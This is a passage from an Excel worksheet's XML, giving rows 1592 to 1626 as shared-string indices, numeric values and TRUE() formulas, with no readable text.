      <c r="C1592" t="s">
        <v>1</v>
      </c>
      <c r="D1592" t="s">
        <v>1826</v>
      </c>
      <c r="E1592" t="s">
        <v>1227</v>
      </c>
      <c r="F1592">
        <v>29117301</v>
      </c>
      <c r="G1592" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1592" t="s">
        <v>1928</v>
      </c>
      <c r="K1592">
        <v>0</v>
      </c>
      <c r="L1592" t="s">
        <v>98</v>
      </c>
      <c r="R1592" t="s">
        <v>5</v>
      </c>
      <c r="S1592" t="s">
        <v>1229</v>
      </c>
      <c r="T1592" t="s">
        <v>7</v>
      </c>
      <c r="U1592" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1593" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1593" s="1">
        <v>17961</v>
      </c>
      <c r="B1593" t="s">
        <v>0</v>
      </c>
      <c r="C1593" t="s">
        <v>78</v>
      </c>
      <c r="D1593" t="s">
        <v>1826</v>
      </c>
      <c r="E1593" t="s">
        <v>1227</v>
      </c>
      <c r="F1593">
        <v>29117301</v>
      </c>
      <c r="G1593" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1593" t="s">
        <v>1929</v>
      </c>
      <c r="K1593">
        <v>0</v>
      </c>
      <c r="L1593" t="s">
        <v>98</v>
      </c>
      <c r="R1593" t="s">
        <v>5</v>
      </c>
      <c r="S1593" t="s">
        <v>1229</v>
      </c>
      <c r="T1593" t="s">
        <v>7</v>
      </c>
      <c r="U1593" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1594" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1594" s="1">
        <v>17962</v>
      </c>
      <c r="B1594" t="s">
        <v>0</v>
      </c>
      <c r="C1594" t="s">
        <v>78</v>
      </c>
      <c r="D1594" t="s">
        <v>1826</v>
      </c>
      <c r="E1594" t="s">
        <v>1227</v>
      </c>
      <c r="F1594">
        <v>29117301</v>
      </c>
      <c r="G1594" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1594" t="s">
        <v>1930</v>
      </c>
      <c r="K1594">
        <v>0</v>
      </c>
      <c r="L1594" t="s">
        <v>98</v>
      </c>
      <c r="R1594" t="s">
        <v>5</v>
      </c>
      <c r="S1594" t="s">
        <v>1229</v>
      </c>
      <c r="T1594" t="s">
        <v>7</v>
      </c>
      <c r="U1594" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1595" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1595" s="1">
        <v>17963</v>
      </c>
      <c r="B1595" t="s">
        <v>0</v>
      </c>
      <c r="C1595" t="s">
        <v>78</v>
      </c>
      <c r="D1595" t="s">
        <v>1826</v>
      </c>
      <c r="E1595" t="s">
        <v>1227</v>
      </c>
      <c r="F1595">
        <v>29117301</v>
      </c>
      <c r="G1595" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1595" t="s">
        <v>1931</v>
      </c>
      <c r="K1595">
        <v>0</v>
      </c>
      <c r="L1595" t="s">
        <v>98</v>
      </c>
      <c r="R1595" t="s">
        <v>5</v>
      </c>
      <c r="S1595" t="s">
        <v>1229</v>
      </c>
      <c r="T1595" t="s">
        <v>7</v>
      </c>
      <c r="U1595" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1596" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1596" s="1">
        <v>17964</v>
      </c>
      <c r="B1596" t="s">
        <v>0</v>
      </c>
      <c r="C1596" t="s">
        <v>78</v>
      </c>
      <c r="D1596" t="s">
        <v>1826</v>
      </c>
      <c r="E1596" t="s">
        <v>1227</v>
      </c>
      <c r="F1596">
        <v>29117301</v>
      </c>
      <c r="G1596" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1596" t="s">
        <v>1932</v>
      </c>
      <c r="K1596">
        <v>0</v>
      </c>
      <c r="L1596" t="s">
        <v>98</v>
      </c>
      <c r="R1596" t="s">
        <v>5</v>
      </c>
      <c r="S1596" t="s">
        <v>1229</v>
      </c>
      <c r="T1596" t="s">
        <v>7</v>
      </c>
      <c r="U1596" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1597" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1597" s="1">
        <v>17965</v>
      </c>
      <c r="B1597" t="s">
        <v>0</v>
      </c>
      <c r="C1597" t="s">
        <v>78</v>
      </c>
      <c r="D1597" t="s">
        <v>1826</v>
      </c>
      <c r="E1597" t="s">
        <v>1227</v>
      </c>
      <c r="F1597">
        <v>29117301</v>
      </c>
      <c r="G1597" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1597" t="s">
        <v>1933</v>
      </c>
      <c r="K1597">
        <v>0</v>
      </c>
      <c r="L1597" t="s">
        <v>98</v>
      </c>
      <c r="R1597" t="s">
        <v>5</v>
      </c>
      <c r="S1597" t="s">
        <v>1229</v>
      </c>
      <c r="T1597" t="s">
        <v>7</v>
      </c>
      <c r="U1597" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1598" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1598" s="1">
        <v>17966</v>
      </c>
      <c r="B1598" t="s">
        <v>0</v>
      </c>
      <c r="C1598" t="s">
        <v>78</v>
      </c>
      <c r="D1598" t="s">
        <v>1826</v>
      </c>
      <c r="E1598" t="s">
        <v>1227</v>
      </c>
      <c r="F1598">
        <v>29117301</v>
      </c>
      <c r="G1598" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1598" t="s">
        <v>1934</v>
      </c>
      <c r="K1598">
        <v>0</v>
      </c>
      <c r="L1598" t="s">
        <v>98</v>
      </c>
      <c r="R1598" t="s">
        <v>5</v>
      </c>
      <c r="S1598" t="s">
        <v>1229</v>
      </c>
      <c r="T1598" t="s">
        <v>7</v>
      </c>
      <c r="U1598" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1599" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1599" s="1">
        <v>17967</v>
      </c>
      <c r="B1599" t="s">
        <v>0</v>
      </c>
      <c r="C1599" t="s">
        <v>1</v>
      </c>
      <c r="D1599" t="s">
        <v>1826</v>
      </c>
      <c r="E1599" t="s">
        <v>1227</v>
      </c>
      <c r="F1599">
        <v>29117301</v>
      </c>
      <c r="G1599" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1599" t="s">
        <v>1935</v>
      </c>
      <c r="K1599">
        <v>0</v>
      </c>
      <c r="L1599" t="s">
        <v>98</v>
      </c>
      <c r="R1599" t="s">
        <v>5</v>
      </c>
      <c r="S1599" t="s">
        <v>1229</v>
      </c>
      <c r="T1599" t="s">
        <v>7</v>
      </c>
      <c r="U1599" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1600" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1600" s="1">
        <v>17968</v>
      </c>
      <c r="B1600" t="s">
        <v>0</v>
      </c>
      <c r="C1600" t="s">
        <v>78</v>
      </c>
      <c r="D1600" t="s">
        <v>1826</v>
      </c>
      <c r="E1600" t="s">
        <v>1227</v>
      </c>
      <c r="F1600">
        <v>29117301</v>
      </c>
      <c r="G1600" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1600" t="s">
        <v>1936</v>
      </c>
      <c r="K1600">
        <v>0</v>
      </c>
      <c r="L1600" t="s">
        <v>98</v>
      </c>
      <c r="R1600" t="s">
        <v>5</v>
      </c>
      <c r="S1600" t="s">
        <v>1229</v>
      </c>
      <c r="T1600" t="s">
        <v>7</v>
      </c>
      <c r="U1600" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1601" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1601" s="1">
        <v>17969</v>
      </c>
      <c r="B1601" t="s">
        <v>0</v>
      </c>
      <c r="C1601" t="s">
        <v>78</v>
      </c>
      <c r="D1601" t="s">
        <v>1826</v>
      </c>
      <c r="E1601" t="s">
        <v>1227</v>
      </c>
      <c r="F1601">
        <v>29117301</v>
      </c>
      <c r="G1601" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1601" t="s">
        <v>1937</v>
      </c>
      <c r="K1601">
        <v>0</v>
      </c>
      <c r="L1601" t="s">
        <v>98</v>
      </c>
      <c r="R1601" t="s">
        <v>5</v>
      </c>
      <c r="S1601" t="s">
        <v>1229</v>
      </c>
      <c r="T1601" t="s">
        <v>7</v>
      </c>
      <c r="U1601" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1602" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1602" s="1">
        <v>17970</v>
      </c>
      <c r="B1602" t="s">
        <v>0</v>
      </c>
      <c r="C1602" t="s">
        <v>78</v>
      </c>
      <c r="D1602" t="s">
        <v>1826</v>
      </c>
      <c r="E1602" t="s">
        <v>1227</v>
      </c>
      <c r="F1602">
        <v>29117301</v>
      </c>
      <c r="G1602" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1602" t="s">
        <v>1938</v>
      </c>
      <c r="K1602">
        <v>0</v>
      </c>
      <c r="L1602" t="s">
        <v>98</v>
      </c>
      <c r="R1602" t="s">
        <v>5</v>
      </c>
      <c r="S1602" t="s">
        <v>1229</v>
      </c>
      <c r="T1602" t="s">
        <v>7</v>
      </c>
      <c r="U1602" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1603" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1603" s="1">
        <v>17971</v>
      </c>
      <c r="B1603" t="s">
        <v>0</v>
      </c>
      <c r="C1603" t="s">
        <v>78</v>
      </c>
      <c r="D1603" t="s">
        <v>1826</v>
      </c>
      <c r="E1603" t="s">
        <v>1227</v>
      </c>
      <c r="F1603">
        <v>29117301</v>
      </c>
      <c r="G1603" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1603" t="s">
        <v>1939</v>
      </c>
      <c r="K1603">
        <v>0</v>
      </c>
      <c r="L1603" t="s">
        <v>98</v>
      </c>
      <c r="R1603" t="s">
        <v>5</v>
      </c>
      <c r="S1603" t="s">
        <v>1229</v>
      </c>
      <c r="T1603" t="s">
        <v>7</v>
      </c>
      <c r="U1603" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1604" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1604" s="1">
        <v>17972</v>
      </c>
      <c r="B1604" t="s">
        <v>0</v>
      </c>
      <c r="C1604" t="s">
        <v>78</v>
      </c>
      <c r="D1604" t="s">
        <v>1826</v>
      </c>
      <c r="E1604" t="s">
        <v>1227</v>
      </c>
      <c r="F1604">
        <v>29117301</v>
      </c>
      <c r="G1604" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1604" t="s">
        <v>1940</v>
      </c>
      <c r="K1604">
        <v>0</v>
      </c>
      <c r="L1604" t="s">
        <v>98</v>
      </c>
      <c r="R1604" t="s">
        <v>5</v>
      </c>
      <c r="S1604" t="s">
        <v>1229</v>
      </c>
      <c r="T1604" t="s">
        <v>7</v>
      </c>
      <c r="U1604" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1605" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1605" s="1">
        <v>17973</v>
      </c>
      <c r="B1605" t="s">
        <v>0</v>
      </c>
      <c r="C1605" t="s">
        <v>78</v>
      </c>
      <c r="D1605" t="s">
        <v>1826</v>
      </c>
      <c r="E1605" t="s">
        <v>1227</v>
      </c>
      <c r="F1605">
        <v>29117301</v>
      </c>
      <c r="G1605" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1605" t="s">
        <v>1941</v>
      </c>
      <c r="K1605">
        <v>0</v>
      </c>
      <c r="L1605" t="s">
        <v>98</v>
      </c>
      <c r="R1605" t="s">
        <v>5</v>
      </c>
      <c r="S1605" t="s">
        <v>1229</v>
      </c>
      <c r="T1605" t="s">
        <v>7</v>
      </c>
      <c r="U1605" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1606" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1606" s="1">
        <v>17974</v>
      </c>
      <c r="B1606" t="s">
        <v>0</v>
      </c>
      <c r="C1606" t="s">
        <v>1</v>
      </c>
      <c r="D1606" t="s">
        <v>1826</v>
      </c>
      <c r="E1606" t="s">
        <v>1227</v>
      </c>
      <c r="F1606">
        <v>29117301</v>
      </c>
      <c r="G1606" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1606" t="s">
        <v>1942</v>
      </c>
      <c r="K1606">
        <v>0</v>
      </c>
      <c r="L1606" t="s">
        <v>98</v>
      </c>
      <c r="R1606" t="s">
        <v>5</v>
      </c>
      <c r="S1606" t="s">
        <v>1229</v>
      </c>
      <c r="T1606" t="s">
        <v>7</v>
      </c>
      <c r="U1606" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1607" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1607" s="1">
        <v>17975</v>
      </c>
      <c r="B1607" t="s">
        <v>0</v>
      </c>
      <c r="C1607" t="s">
        <v>78</v>
      </c>
      <c r="D1607" t="s">
        <v>1826</v>
      </c>
      <c r="E1607" t="s">
        <v>1227</v>
      </c>
      <c r="F1607">
        <v>29117301</v>
      </c>
      <c r="G1607" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1607" t="s">
        <v>1943</v>
      </c>
      <c r="K1607">
        <v>0</v>
      </c>
      <c r="L1607" t="s">
        <v>98</v>
      </c>
      <c r="R1607" t="s">
        <v>5</v>
      </c>
      <c r="S1607" t="s">
        <v>1229</v>
      </c>
      <c r="T1607" t="s">
        <v>7</v>
      </c>
      <c r="U1607" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1608" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1608" s="1">
        <v>17976</v>
      </c>
      <c r="B1608" t="s">
        <v>0</v>
      </c>
      <c r="C1608" t="s">
        <v>78</v>
      </c>
      <c r="D1608" t="s">
        <v>1826</v>
      </c>
      <c r="E1608" t="s">
        <v>1227</v>
      </c>
      <c r="F1608">
        <v>29117301</v>
      </c>
      <c r="G1608" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1608" t="s">
        <v>1944</v>
      </c>
      <c r="K1608">
        <v>0</v>
      </c>
      <c r="L1608" t="s">
        <v>98</v>
      </c>
      <c r="R1608" t="s">
        <v>5</v>
      </c>
      <c r="S1608" t="s">
        <v>1229</v>
      </c>
      <c r="T1608" t="s">
        <v>7</v>
      </c>
      <c r="U1608" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1609" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1609" s="1">
        <v>17977</v>
      </c>
      <c r="B1609" t="s">
        <v>0</v>
      </c>
      <c r="C1609" t="s">
        <v>78</v>
      </c>
      <c r="D1609" t="s">
        <v>1826</v>
      </c>
      <c r="E1609" t="s">
        <v>1227</v>
      </c>
      <c r="F1609">
        <v>29117301</v>
      </c>
      <c r="G1609" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1609" t="s">
        <v>1945</v>
      </c>
      <c r="K1609">
        <v>0</v>
      </c>
      <c r="L1609" t="s">
        <v>98</v>
      </c>
      <c r="R1609" t="s">
        <v>5</v>
      </c>
      <c r="S1609" t="s">
        <v>1229</v>
      </c>
      <c r="T1609" t="s">
        <v>7</v>
      </c>
      <c r="U1609" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1610" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1610" s="1">
        <v>17978</v>
      </c>
      <c r="B1610" t="s">
        <v>0</v>
      </c>
      <c r="C1610" t="s">
        <v>78</v>
      </c>
      <c r="D1610" t="s">
        <v>1826</v>
      </c>
      <c r="E1610" t="s">
        <v>1227</v>
      </c>
      <c r="F1610">
        <v>29117301</v>
      </c>
      <c r="G1610" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1610" t="s">
        <v>1946</v>
      </c>
      <c r="K1610">
        <v>0</v>
      </c>
      <c r="L1610" t="s">
        <v>98</v>
      </c>
      <c r="R1610" t="s">
        <v>5</v>
      </c>
      <c r="S1610" t="s">
        <v>1229</v>
      </c>
      <c r="T1610" t="s">
        <v>7</v>
      </c>
      <c r="U1610" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1611" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1611" s="1">
        <v>17979</v>
      </c>
      <c r="B1611" t="s">
        <v>0</v>
      </c>
      <c r="C1611" t="s">
        <v>78</v>
      </c>
      <c r="D1611" t="s">
        <v>1826</v>
      </c>
      <c r="E1611" t="s">
        <v>1227</v>
      </c>
      <c r="F1611">
        <v>29117301</v>
      </c>
      <c r="G1611" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1611" t="s">
        <v>1947</v>
      </c>
      <c r="K1611">
        <v>0</v>
      </c>
      <c r="L1611" t="s">
        <v>98</v>
      </c>
      <c r="R1611" t="s">
        <v>5</v>
      </c>
      <c r="S1611" t="s">
        <v>1229</v>
      </c>
      <c r="T1611" t="s">
        <v>7</v>
      </c>
      <c r="U1611" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1612" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1612" s="1">
        <v>17980</v>
      </c>
      <c r="B1612" t="s">
        <v>0</v>
      </c>
      <c r="C1612" t="s">
        <v>78</v>
      </c>
      <c r="D1612" t="s">
        <v>1826</v>
      </c>
      <c r="E1612" t="s">
        <v>1227</v>
      </c>
      <c r="F1612">
        <v>29117301</v>
      </c>
      <c r="G1612" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1612" t="s">
        <v>1948</v>
      </c>
      <c r="K1612">
        <v>0</v>
      </c>
      <c r="L1612" t="s">
        <v>98</v>
      </c>
      <c r="R1612" t="s">
        <v>5</v>
      </c>
      <c r="S1612" t="s">
        <v>1229</v>
      </c>
      <c r="T1612" t="s">
        <v>7</v>
      </c>
      <c r="U1612" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1613" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1613" s="1">
        <v>17981</v>
      </c>
      <c r="B1613" t="s">
        <v>0</v>
      </c>
      <c r="C1613" t="s">
        <v>78</v>
      </c>
      <c r="D1613" t="s">
        <v>1826</v>
      </c>
      <c r="E1613" t="s">
        <v>1227</v>
      </c>
      <c r="F1613">
        <v>29117301</v>
      </c>
      <c r="G1613" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1613" t="s">
        <v>1949</v>
      </c>
      <c r="K1613">
        <v>0</v>
      </c>
      <c r="L1613" t="s">
        <v>98</v>
      </c>
      <c r="R1613" t="s">
        <v>5</v>
      </c>
      <c r="S1613" t="s">
        <v>1229</v>
      </c>
      <c r="T1613" t="s">
        <v>7</v>
      </c>
      <c r="U1613" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1614" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1614" s="1">
        <v>17982</v>
      </c>
      <c r="B1614" t="s">
        <v>0</v>
      </c>
      <c r="C1614" t="s">
        <v>78</v>
      </c>
      <c r="D1614" t="s">
        <v>1826</v>
      </c>
      <c r="E1614" t="s">
        <v>1227</v>
      </c>
      <c r="F1614">
        <v>29117301</v>
      </c>
      <c r="G1614" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1614" t="s">
        <v>1950</v>
      </c>
      <c r="K1614">
        <v>0</v>
      </c>
      <c r="L1614" t="s">
        <v>98</v>
      </c>
      <c r="R1614" t="s">
        <v>5</v>
      </c>
      <c r="S1614" t="s">
        <v>1229</v>
      </c>
      <c r="T1614" t="s">
        <v>7</v>
      </c>
      <c r="U1614" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1615" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1615" s="1">
        <v>17983</v>
      </c>
      <c r="B1615" t="s">
        <v>0</v>
      </c>
      <c r="C1615" t="s">
        <v>78</v>
      </c>
      <c r="D1615" t="s">
        <v>1826</v>
      </c>
      <c r="E1615" t="s">
        <v>1227</v>
      </c>
      <c r="F1615">
        <v>29117301</v>
      </c>
      <c r="G1615" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1615" t="s">
        <v>1951</v>
      </c>
      <c r="K1615">
        <v>0</v>
      </c>
      <c r="L1615" t="s">
        <v>98</v>
      </c>
      <c r="R1615" t="s">
        <v>5</v>
      </c>
      <c r="S1615" t="s">
        <v>1229</v>
      </c>
      <c r="T1615" t="s">
        <v>7</v>
      </c>
      <c r="U1615" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1616" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1616" s="1">
        <v>17984</v>
      </c>
      <c r="B1616" t="s">
        <v>0</v>
      </c>
      <c r="C1616" t="s">
        <v>78</v>
      </c>
      <c r="D1616" t="s">
        <v>1826</v>
      </c>
      <c r="E1616" t="s">
        <v>1227</v>
      </c>
      <c r="F1616">
        <v>29117301</v>
      </c>
      <c r="G1616" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1616" t="s">
        <v>1952</v>
      </c>
      <c r="K1616">
        <v>0</v>
      </c>
      <c r="L1616" t="s">
        <v>98</v>
      </c>
      <c r="R1616" t="s">
        <v>5</v>
      </c>
      <c r="S1616" t="s">
        <v>1229</v>
      </c>
      <c r="T1616" t="s">
        <v>7</v>
      </c>
      <c r="U1616" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1617" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1617" s="1">
        <v>17985</v>
      </c>
      <c r="B1617" t="s">
        <v>0</v>
      </c>
      <c r="C1617" t="s">
        <v>78</v>
      </c>
      <c r="D1617" t="s">
        <v>1826</v>
      </c>
      <c r="E1617" t="s">
        <v>1227</v>
      </c>
      <c r="F1617">
        <v>29117301</v>
      </c>
      <c r="G1617" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1617" t="s">
        <v>1953</v>
      </c>
      <c r="K1617">
        <v>0</v>
      </c>
      <c r="L1617" t="s">
        <v>98</v>
      </c>
      <c r="R1617" t="s">
        <v>5</v>
      </c>
      <c r="S1617" t="s">
        <v>1229</v>
      </c>
      <c r="T1617" t="s">
        <v>7</v>
      </c>
      <c r="U1617" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1618" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1618" s="1">
        <v>17986</v>
      </c>
      <c r="B1618" t="s">
        <v>0</v>
      </c>
      <c r="C1618" t="s">
        <v>78</v>
      </c>
      <c r="D1618" t="s">
        <v>1826</v>
      </c>
      <c r="E1618" t="s">
        <v>1227</v>
      </c>
      <c r="F1618">
        <v>29117301</v>
      </c>
      <c r="G1618" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1618" t="s">
        <v>1954</v>
      </c>
      <c r="K1618">
        <v>0</v>
      </c>
      <c r="L1618" t="s">
        <v>98</v>
      </c>
      <c r="R1618" t="s">
        <v>5</v>
      </c>
      <c r="S1618" t="s">
        <v>1229</v>
      </c>
      <c r="T1618" t="s">
        <v>7</v>
      </c>
      <c r="U1618" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1619" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1619" s="1">
        <v>17987</v>
      </c>
      <c r="B1619" t="s">
        <v>0</v>
      </c>
      <c r="C1619" t="s">
        <v>78</v>
      </c>
      <c r="D1619" t="s">
        <v>1826</v>
      </c>
      <c r="E1619" t="s">
        <v>1227</v>
      </c>
      <c r="F1619">
        <v>29117301</v>
      </c>
      <c r="G1619" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1619" t="s">
        <v>1955</v>
      </c>
      <c r="K1619">
        <v>0</v>
      </c>
      <c r="L1619" t="s">
        <v>98</v>
      </c>
      <c r="R1619" t="s">
        <v>5</v>
      </c>
      <c r="S1619" t="s">
        <v>1229</v>
      </c>
      <c r="T1619" t="s">
        <v>7</v>
      </c>
      <c r="U1619" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1620" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1620" s="1">
        <v>17988</v>
      </c>
      <c r="B1620" t="s">
        <v>0</v>
      </c>
      <c r="C1620" t="s">
        <v>78</v>
      </c>
      <c r="D1620" t="s">
        <v>1826</v>
      </c>
      <c r="E1620" t="s">
        <v>1227</v>
      </c>
      <c r="F1620">
        <v>29117301</v>
      </c>
      <c r="G1620" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1620" t="s">
        <v>1956</v>
      </c>
      <c r="K1620">
        <v>0</v>
      </c>
      <c r="L1620" t="s">
        <v>98</v>
      </c>
      <c r="R1620" t="s">
        <v>5</v>
      </c>
      <c r="S1620" t="s">
        <v>1229</v>
      </c>
      <c r="T1620" t="s">
        <v>7</v>
      </c>
      <c r="U1620" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1621" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1621" s="1">
        <v>17989</v>
      </c>
      <c r="B1621" t="s">
        <v>0</v>
      </c>
      <c r="C1621" t="s">
        <v>1</v>
      </c>
      <c r="D1621" t="s">
        <v>1826</v>
      </c>
      <c r="E1621" t="s">
        <v>1227</v>
      </c>
      <c r="F1621">
        <v>29117301</v>
      </c>
      <c r="G1621" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1621" t="s">
        <v>1957</v>
      </c>
      <c r="K1621">
        <v>0</v>
      </c>
      <c r="L1621" t="s">
        <v>98</v>
      </c>
      <c r="R1621" t="s">
        <v>5</v>
      </c>
      <c r="S1621" t="s">
        <v>1229</v>
      </c>
      <c r="T1621" t="s">
        <v>7</v>
      </c>
      <c r="U1621" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1622" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1622" s="1">
        <v>17990</v>
      </c>
      <c r="B1622" t="s">
        <v>0</v>
      </c>
      <c r="C1622" t="s">
        <v>78</v>
      </c>
      <c r="D1622" t="s">
        <v>1826</v>
      </c>
      <c r="E1622" t="s">
        <v>1227</v>
      </c>
      <c r="F1622">
        <v>29117301</v>
      </c>
      <c r="G1622" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1622" t="s">
        <v>1958</v>
      </c>
      <c r="K1622">
        <v>0</v>
      </c>
      <c r="L1622" t="s">
        <v>98</v>
      </c>
      <c r="R1622" t="s">
        <v>5</v>
      </c>
      <c r="S1622" t="s">
        <v>1229</v>
      </c>
      <c r="T1622" t="s">
        <v>7</v>
      </c>
      <c r="U1622" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1623" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1623" s="1">
        <v>17991</v>
      </c>
      <c r="B1623" t="s">
        <v>0</v>
      </c>
      <c r="C1623" t="s">
        <v>78</v>
      </c>
      <c r="D1623" t="s">
        <v>1826</v>
      </c>
      <c r="E1623" t="s">
        <v>1227</v>
      </c>
      <c r="F1623">
        <v>29117301</v>
      </c>
      <c r="G1623" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1623" t="s">
        <v>1959</v>
      </c>
      <c r="K1623">
        <v>0</v>
      </c>
      <c r="L1623" t="s">
        <v>98</v>
      </c>
      <c r="R1623" t="s">
        <v>5</v>
      </c>
      <c r="S1623" t="s">
        <v>1229</v>
      </c>
      <c r="T1623" t="s">
        <v>7</v>
      </c>
      <c r="U1623" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1624" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1624" s="1">
        <v>17992</v>
      </c>
      <c r="B1624" t="s">
        <v>0</v>
      </c>
      <c r="C1624" t="s">
        <v>78</v>
      </c>
      <c r="D1624" t="s">
        <v>1826</v>
      </c>
      <c r="E1624" t="s">
        <v>1227</v>
      </c>
      <c r="F1624">
        <v>29117301</v>
      </c>
      <c r="G1624" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1624" t="s">
        <v>1960</v>
      </c>
      <c r="K1624">
        <v>0</v>
      </c>
      <c r="L1624" t="s">
        <v>98</v>
      </c>
      <c r="R1624" t="s">
        <v>5</v>
      </c>
      <c r="S1624" t="s">
        <v>1229</v>
      </c>
      <c r="T1624" t="s">
        <v>7</v>
      </c>
      <c r="U1624" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1625" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1625" s="1">
        <v>17993</v>
      </c>
      <c r="B1625" t="s">
        <v>0</v>
      </c>
      <c r="C1625" t="s">
        <v>78</v>
      </c>
      <c r="D1625" t="s">
        <v>1826</v>
      </c>
      <c r="E1625" t="s">
        <v>1227</v>
      </c>
      <c r="F1625">
        <v>29117301</v>
      </c>
      <c r="G1625" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1625" t="s">
        <v>1961</v>
      </c>
      <c r="K1625">
        <v>0</v>
      </c>
      <c r="L1625" t="s">
        <v>98</v>
      </c>
      <c r="R1625" t="s">
        <v>5</v>
      </c>
      <c r="S1625" t="s">
        <v>1229</v>
      </c>
      <c r="T1625" t="s">
        <v>7</v>
      </c>
      <c r="U1625" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1626" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1626" s="1">
        <v>17994</v>
      </c>
      <c r="B1626" t="s">
        <v>0</v>
      </c>
      <c r="C1626" t="s">
        <v>1</v>
      </c>
